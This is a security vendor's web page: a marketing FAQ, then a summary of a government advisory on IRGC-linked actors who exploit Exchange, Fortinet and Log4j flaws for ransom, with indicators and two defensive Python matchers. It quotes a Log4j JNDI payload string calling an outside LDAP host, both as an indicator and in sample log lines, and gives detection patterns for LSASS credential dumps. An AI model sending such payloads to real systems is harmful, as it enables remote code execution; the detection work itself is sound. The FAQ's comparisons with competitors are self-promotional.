Frequently Asked Questions

Threat Landscape & IRGC-Linked Attacks

What vulnerabilities have IRGC-linked cyber actors exploited for ransom operations?

IRGC-linked cyber actors have exploited several known vulnerabilities for initial access, including Fortinet FortiOS (CVE-2018-13379, CVE-2020-12812, CVE-2019-5591), Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and VMware Horizon Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105). These vulnerabilities have been used to deploy tools for ransom, extortion, and data exfiltration. Source

How do IRGC-affiliated actors use initial access for ransom and extortion?

After gaining initial access, IRGC-affiliated actors may encrypt data for ransom, exfiltrate data for extortion, or use a combination of both (double extortion). They determine their course of action based on the perceived value of the data, sometimes selling or using it to pressure victims into paying ransom demands. Source

What indicators of compromise (IOCs) are associated with ProxyShell and Log4j exploitation?

IOCs for ProxyShell exploitation include web shells with naming conventions like aspx_[random].aspx, login.aspx, or default.aspx in Exchange directories. For Log4j exploitation, IOCs include user agent strings like ${jndi:ldap//148.251.71.182:1389/RCE} and files such as RCE.class. Source

How do IRGC-linked actors maintain persistence in compromised environments?

They establish new user accounts on domain controllers, servers, and workstations, often enabling built-in Windows accounts (e.g., DefaultAccount) and escalating privileges to administrator level. Some accounts are created to mimic legitimate ones, making detection harder. Source

What ransom techniques are used by IRGC-affiliated actors?

They force BitLocker activation to encrypt data and hold decryption keys for ransom. Ransom notes are sent via email, left as .txt files, or printed on networked printers, often including contact details for negotiation. Source

How do these actors exfiltrate credentials and sensitive data?

They dump and exfiltrate the Local Security Authority Subsystem Service (LSASS) process memory, storing files like sassl.pmd, ssasl.zip, or lsass.dmp in temporary directories for credential harvesting and data theft. Source

What scheduled tasks may indicate IRGC-linked activity?

Unrecognized scheduled tasks or actions named Wininet, Wininet', WinLogon, or CacheTask may be associated with IRGC-linked activity, though some may be legitimate. Source

What are common account names used by IRGC-affiliated actors for persistence?

Common account names include Domain Admin, it_admin, DefaultAccount, and Default01. These may be created to resemble legitimate accounts and evade detection. Source

How does Cymulate help organizations defend against threats like those from IRGC-linked actors?

Cymulate enables organizations to simulate real-world attacks, validate security controls, and identify exploitable exposures. By continuously testing defenses against tactics used by groups like IRGC-linked actors, organizations can proactively remediate vulnerabilities and improve resilience. Learn more

What resources does Cymulate offer for understanding and mitigating advanced threats?

Cymulate provides whitepapers, technical guides, solution briefs, and case studies that cover exposure management, threat validation, detection engineering, and more. These resources help organizations stay informed and implement best practices. Explore resources

Features & Capabilities

What are the key features of the Cymulate Exposure Management Platform?

Cymulate's platform offers continuous threat validation, breach and attack simulation (BAS), continuous automated red teaming (CART), exposure analytics, attack path discovery, cloud validation, and an extensive threat library with daily updates. These features help organizations proactively identify and remediate security gaps. Learn more

Does Cymulate support integration with other security tools?

Yes, Cymulate integrates with a wide range of security technologies, including EDR and anti-malware (e.g., CrowdStrike Falcon, Cisco Secure Endpoint), SIEM (CrowdStrike Falcon LogScale), cloud security (AWS GuardDuty, Check Point CloudGuard), network security (Akamai Guardicore), and vulnerability management (CrowdStrike Falcon Spotlight). See all integrations

How does Cymulate's Threat (IoC) updates feature improve threat resilience?

The Threat (IoC) updates feature provides recommended Indicators of Compromise that can be exported and applied directly to security controls, improving resilience by enabling rapid defense against new threats. Learn more

What technical documentation is available for Cymulate users?

Cymulate offers whitepapers, guides, solution briefs, data sheets, and industry reports covering exposure management, CTEM, detection engineering, vulnerability management, and more. These resources provide in-depth technical knowledge for users. Access documentation

How often is Cymulate's threat library updated?

Cymulate's threat library is updated daily, ensuring that organizations can test their defenses against the latest attack techniques and emerging threats. Learn more

What is Cymulate's approach to cloud security validation?

Cymulate provides dedicated validation features for hybrid and cloud environments, allowing organizations to assess and optimize their cloud security controls against real-world threats. Learn more

How does Cymulate support detection engineering?

Cymulate helps organizations build, validate, and optimize threat detections at scale, enabling teams to tune SIEM, EDR, and XDR controls for improved mean time to detect and respond. Learn more

What is Cymulate's implementation process like?

Cymulate is agentless and requires no additional hardware or complex configuration. Customers report that deployment is quick and straightforward, allowing simulations to run almost immediately. See customer feedback

Use Cases & Benefits

Who can benefit from using Cymulate?

Cymulate is designed for CISOs, security leaders, SecOps teams, red teams, and vulnerability management teams across industries such as financial services, healthcare, retail, media, and transportation. Organizations of all sizes, from small teams to enterprises with over 10,000 employees, use Cymulate to enhance their security posture. Learn more

What business impact can customers expect from Cymulate?

Customers have reported an 81% reduction in cyber risk within four months, a 60% increase in team efficiency, a 52% reduction in critical exposures, and a 30% improvement in threat prevention. These outcomes are supported by case studies such as Hertz Israel and Nemours Children's Health. Read case studies

How does Cymulate address the pain points of security teams?

Cymulate solves challenges such as overwhelming threat volume, lack of visibility, unclear prioritization, operational inefficiencies, fragmented tools, cloud complexity, and communication barriers by providing a unified, automated, and evidence-based exposure management platform. Learn more

Are there case studies showing Cymulate's effectiveness?

Yes, Cymulate features case studies across industries, including Hertz Israel (81% risk reduction), Nemours Children's Health (improved visibility), and a financial services organization (automated testing and prioritization). See all case studies

How does Cymulate tailor solutions for different security roles?

Cymulate addresses the unique needs of CISOs (metrics and alignment), SecOps (automation and efficiency), red teams (scalable offensive testing), and vulnerability management teams (prioritization and consolidation). Learn more

What feedback have customers given about Cymulate's ease of use?

Customers consistently praise Cymulate for its intuitive, user-friendly interface and quick implementation. Testimonials highlight the platform's ability to deliver actionable insights with minimal effort. Read testimonials

Security, Compliance & Trust

What security and compliance certifications does Cymulate hold?

Cymulate is certified for SOC2 Type II, ISO 27001:2013 (Information Security Management), ISO 27701 (Privacy Information Management), ISO 27017 (Cloud Services Security), and CSA STAR Level 1. These certifications demonstrate Cymulate's commitment to security, privacy, and cloud compliance. See details

How does Cymulate ensure data security and privacy?

Cymulate hosts its services in secure AWS data centers, uses encryption for data in transit (TLS 1.2+) and at rest (AES-256), and follows a strict Secure Development Lifecycle (SDLC) with continuous vulnerability scanning and annual third-party penetration tests. Learn more

Is Cymulate GDPR compliant?

Yes, Cymulate adopts a holistic approach to GDPR, incorporating data protection by design and maintaining a dedicated privacy and security team, including a Data Protection Officer (DPO) and Chief Information Security Officer (CISO). See compliance details

How does Cymulate train its employees on security?

All Cymulate employees receive ongoing security awareness training, are subject to phishing campaign tests, and must adhere to comprehensive security policies. Learn more

Pricing & Plans

What is Cymulate's pricing model?

Cymulate operates on a subscription-based pricing model tailored to each organization's needs. Pricing depends on the package, number of assets, and scenarios selected. For a custom quote, schedule a demo with Cymulate's team. Book a demo

Competition & Comparison

How does Cymulate compare to AttackIQ?

While AttackIQ provides automated security validation, Cymulate offers a more comprehensive threat scenario library, advanced AI-powered features, and greater ease of use. See comparison

What differentiates Cymulate from Mandiant Security Validation?

Cymulate stands out for its continuous innovation, AI-powered automation, and expanded exposure management capabilities, whereas Mandiant has seen less innovation in recent years. See comparison

How does Cymulate compare to Pentera?

Pentera focuses on attack path validation, but Cymulate provides a more complete exposure validation platform, covering the full kill chain and offering cloud control validation. See comparison

What makes Cymulate different from Picus Security?

Picus Security offers BAS with on-prem options, but Cymulate delivers a comprehensive exposure validation platform with full kill chain coverage and cloud control validation. See comparison

How does Cymulate compare to SafeBreach?

SafeBreach provides breach and attack simulation, but Cymulate offers a full CTEM solution, comprehensive exposure validation, and advanced automation with the industry's largest attack library. See comparison

What are the advantages of Cymulate over Scythe?

Scythe is built for advanced red teams to build custom attack campaigns, while Cymulate offers automated, no-code workflows, daily threat updates, and actionable remediation guidance, making it more user-friendly for security teams. See comparison

Company Information & Vision

When was Cymulate founded and how large is the company?

Cymulate was founded in 2016 and has a global presence with offices in eight locations, serving over 1,000 customers in 50 countries. Learn more

What is Cymulate's mission and vision?

Cymulate's mission is to revolutionize cybersecurity by fostering a proactive approach to managing threats, empowering organizations to effectively manage their security posture and improve resilience. See company vision

How does Cymulate contribute to the future of cybersecurity?

Cymulate drives innovation in exposure management, continuous threat validation, and automation, helping organizations shift from reactive to proactive security strategies and align with emerging industry trends. Learn more


IRGC-Linked Cyber Actors Exploit Vulnerabilities for Ransom Ops

September 18, 2022

As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability).
The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207.
The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems.
The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.

Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access.
In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 ("Log4Shell"), CVE-2021-45046, and CVE-2021-45105 for initial access.

The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts.
After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or "double extortion" ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.

Initial Access [TA0001]
As stated in the Technical Details section previously reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the IRGC-affiliated actors gained initial access by exploiting known vulnerabilities [T1190].

The following IOCs, observed as of March 2022, are indicative of ProxyShell vulnerability exploitation on targeted entity networks:

Web shells with naming conventions aspx_[11 randomly generated alphabetic characters].aspx, login.aspx, or default.aspx in any of the following directories:
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth
C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
C:\inetpub\wwwroot\aspnet_client
The following IOCs, observed as of December 2021, are indicative of Log4j vulnerability exploitation on targeted entity networks:

${jndi:ldap//148.251.71.182:1389/RCE} (user agent string)
RCE.class
Execution [TA0002]
The IRGC-affiliated actors may have made modifications to the Task Scheduler [T1053.005]. These modifications may display as unrecognized scheduled tasks or actions. Specifically, the below established tasks may be associated with this activity:

Wininet
Wininet'
WinLogon
CacheTask
Note: The potential exists that tasks associated with CacheTask or Wininet may be legitimate. For additional tasks used by these IRGC-affiliated cyber actors, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Persistence [TA0003]
The IRGC-affiliated actors established new user accounts on domain controllers, servers, workstations, and active directories [T1136.001, T1136.002]. The actors enabled a built-in Windows account (DefaultAccount) and escalated privileges to gain administrator-level access to a network. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity:

Domain Admin
it_admin
DefaultAccount
Default01
Note: For additional account usernames associated with this activity, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.
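
As an added example (not part of the advisory and not Cymulate's tooling), the following Python triages Windows Security audit records against the scheduled-task names in the Execution section and the account usernames in the Persistence section above. It applies the advisory's caveat that Wininet and CacheTask may be legitimate by rating such a task lower when it sits under Windows' own \Microsoft\Windows task folder, and never down-rates a task registered by an account that is itself on the list. Event IDs 4720 (account created), 4722 (account enabled) and 4698 (scheduled task created) are standard Windows Security events; the flat record shape and every sample value are constructed for the example.

```python
from typing import Dict, List, Optional

# Names from the Execution and Persistence sections, compared case-insensitively.
IOC_ACCOUNT_NAMES = {"domain admin", "it_admin", "defaultaccount", "default01"}
IOC_TASK_NAMES = {"wininet", "wininet'", "winlogon", "cachetask"}
# The advisory notes that tasks named Wininet or CacheTask may be legitimate.
POSSIBLY_LEGITIMATE_TASKS = {"wininet", "cachetask"}
# Folder under which Windows registers its own tasks (assumption used for down-rating).
BUILTIN_TASK_FOLDER = "\\microsoft\\windows"


def triage_event(event: Dict) -> Optional[Dict]:
    """Return a finding for one audit record, or None when nothing matches."""
    eid = event.get("EventID")
    computer = event.get("Computer", "?")
    subject = event.get("SubjectUserName", "?")

    if eid in (4720, 4722):  # user account created / user account enabled
        target = event.get("TargetUserName", "")
        if target.lower() not in IOC_ACCOUNT_NAMES:
            return None
        verb = "created" if eid == 4720 else "enabled"
        return {"severity": "high", "computer": computer,
                "reason": f"account '{target}' {verb} by '{subject}' is on the advisory account list"}

    if eid == 4698:  # scheduled task created
        task = event.get("TaskName", "")
        folder, _, leaf = task.rpartition("\\")
        if leaf.lower() not in IOC_TASK_NAMES:
            return None
        severity = "high"
        # Down-rate only the names the advisory flags as possibly legitimate, and only
        # when the task lives where Windows keeps its own tasks.
        if leaf.lower() in POSSIBLY_LEGITIMATE_TASKS and folder.lower().startswith(BUILTIN_TASK_FOLDER):
            severity = "low"
        # A task registered by an IoC account is suspicious regardless of its location.
        if subject.lower() in IOC_ACCOUNT_NAMES:
            severity = "high"
        return {"severity": severity, "computer": computer,
                "reason": f"scheduled task '{task}' created by '{subject}' matches advisory task list"}

    return None


def triage(events: List[Dict]) -> List[Dict]:
    """Run triage_event over a batch and keep only the findings."""
    return [f for f in (triage_event(e) for e in events) if f]


def hosts_with_severity(findings: List[Dict], severity: str) -> List[str]:
    """Distinct hosts carrying at least one finding of the given severity."""
    return sorted({f["computer"] for f in findings if f["severity"] == severity})


# Constructed sample records (not real telemetry) in a flattened SIEM-export shape.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "it_admin", "SubjectUserName": "svc-backup", "Computer": "DC01"},
    {"EventID": 4720, "TargetUserName": "jsmith", "SubjectUserName": "hr-admin", "Computer": "DC01"},
    {"EventID": 4722, "TargetUserName": "DefaultAccount", "SubjectUserName": "it_admin", "Computer": "WS-042"},
    {"EventID": 4698, "TaskName": r"\Wininet'", "SubjectUserName": "it_admin", "Computer": "WS-042"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Wininet\CacheTask", "SubjectUserName": "SYSTEM", "Computer": "WS-042"},
    {"EventID": 4698, "TaskName": r"\WinLogon", "SubjectUserName": "Default01", "Computer": "SRV-FILE01"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["computer"], finding["reason"])
```

Name matching alone is a lead, not a verdict: the advisory says specific account names vary per organisation, so the account list here is a starting point that should be extended with the unrecognised accounts and task names found in your own environment.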

Exfiltration [TA0010]
The authoring agencies have observed the IRGC-affiliated actors dumping and subsequently exfiltrating the Local Security Authority Subsystem Service (LSASS) process memory on targeted entity networks in furtherance of credential harvesting. The following IOCs are associated with data exfiltration from targeted entity networks:

C:\Windows\Temp\sassl[.]pmd
C:\Windows\Temp\ssasl[.]zip
C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]dmp
C:\Users\DefaultAccount\AppData\Local\Temp\lsass[.]zip
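
The file-based indicators from the Initial Access section (ProxyShell web shell names in the three Exchange directories) and from the Exfiltration section (the LSASS dump artefacts above), together with the Log4j user agent string, can be checked with one small matcher. The Python below is an added example, not part of the advisory or of Cymulate's product. It normalises Windows paths so that case and slash style do not matter, matches web shells on both name pattern and directory, and generalises the single Log4j user agent on the page to any ${jndi:...} lookup (including the form without "://" exactly as the page prints it). The file listing and IIS log lines are constructed sample input; the 148.251.71.182 address comes from the advisory, the client addresses are documentation ranges.

```python
import re
from typing import Dict, List, Optional, Tuple


def norm(path: str) -> str:
    """Normalise a Windows path for comparison: one separator style, lower case."""
    return path.replace("/", "\\").lower().rstrip("\\")


# ProxyShell web shell directories named in the Initial Access section.
WEBSHELL_DIRS = {norm(p) for p in (
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\ecp\auth",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth",
    r"C:\inetpub\wwwroot\aspnet_client",
)}
# aspx_ + 11 alphabetic characters + .aspx, login.aspx or default.aspx; applied to the
# lower-cased file name.
WEBSHELL_NAME = re.compile(r"^(aspx_[a-z]{11}|login|default)\.aspx$")

# LSASS dump artefacts from the Exfiltration section, with the "[.]" defanging removed.
LSASS_DUMP_PATHS = {norm(p) for p in (
    r"C:\Windows\Temp\sassl.pmd",
    r"C:\Windows\Temp\ssasl.zip",
    r"C:\Users\DefaultAccount\AppData\Local\Temp\lsass.dmp",
    r"C:\Users\DefaultAccount\AppData\Local\Temp\lsass.zip",
)}

# Any ${jndi:...} lookup in a log field. The advisory's user agent is written without
# "://", so the pattern keys on the lookup prefix rather than on a full URL.
JNDI_RE = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def classify_path(path: str) -> Optional[str]:
    """Return the IoC category a file path matches, or None."""
    n = norm(path)
    if n in LSASS_DUMP_PATHS:
        return "lsass_dump"
    folder, _, leaf = n.rpartition("\\")
    if folder in WEBSHELL_DIRS and WEBSHELL_NAME.match(leaf):
        # Name-and-location match only: confirm with file hash, timestamps and content.
        return "proxyshell_webshell"
    return None


def scan_files(paths: List[str]) -> Dict[str, List[str]]:
    """Group every matching path under its IoC category."""
    hits: Dict[str, List[str]] = {"proxyshell_webshell": [], "lsass_dump": []}
    for p in paths:
        category = classify_path(p)
        if category:
            hits[category].append(p)
    return hits


def scan_log_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, matched JNDI lookup) for each line containing one."""
    found: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, start=1):
        m = JNDI_RE.search(line)
        if m:
            found.append((number, m.group(0)))
    return found


# Constructed file listing (on a real host, feed os.walk() output instead).
SAMPLE_FILES = [
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aspx_qwertyuiopa.aspx",
    r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx",  # not an advisory name
    r"C:\inetpub\wwwroot\aspnet_client\login.aspx",
    r"C:\inetpub\wwwroot\aspnet_client\system_web\bundle.js",
    r"C:\Users\DefaultAccount\AppData\Local\Temp\lsass.dmp",
    r"C:\Windows\Temp\ssasl.zip",
    r"C:\Windows\Temp\report.zip",
]

# Constructed IIS W3C log lines; the user agent is the one the advisory lists.
SAMPLE_IIS_LOG = [
    "2022-03-02 10:14:51 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) - 200 0 0 12",
    "2022-03-02 10:15:02 10.0.0.5 GET / - 443 - 203.0.113.9 ${jndi:ldap//148.251.71.182:1389/RCE} - 200 0 0 8",
    "2022-03-02 10:15:09 10.0.0.5 GET /api/health - 443 - 198.51.100.7 curl/7.79.1 - 200 0 0 3",
]

if __name__ == "__main__":
    for category, paths in scan_files(SAMPLE_FILES).items():
        for p in paths:
            print(category, p)
    for number, token in scan_log_lines(SAMPLE_IIS_LOG):
        print(f"log line {number}: {token}")
```

Because the web shell rule needs both a listed directory and a listed name pattern, a file with an innocuous name in those directories or a suspicious name elsewhere is not reported; widen either side deliberately if your hunt calls for it, and treat every hit as a lead to verify rather than a confirmed compromise.
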
Impact [TA0040]
The IRGC-affiliated actors forced BitLocker activation on host networks to encrypt data [T1486] and held the decryption keys for ransom. The corresponding ransom notes were sent to the targeted entity, left on the targeted entity network as a .txt file or printed on the targeted entity's networked printer(s). The notes included the following contact information:

@BuySafety (Telegram)
@WeRBits (Telegram)
+93794415076 (WhatsApp)
werbits@onionmail[.]org
buysafety@onionmail[.]org
yacashcash@rambler[.]ru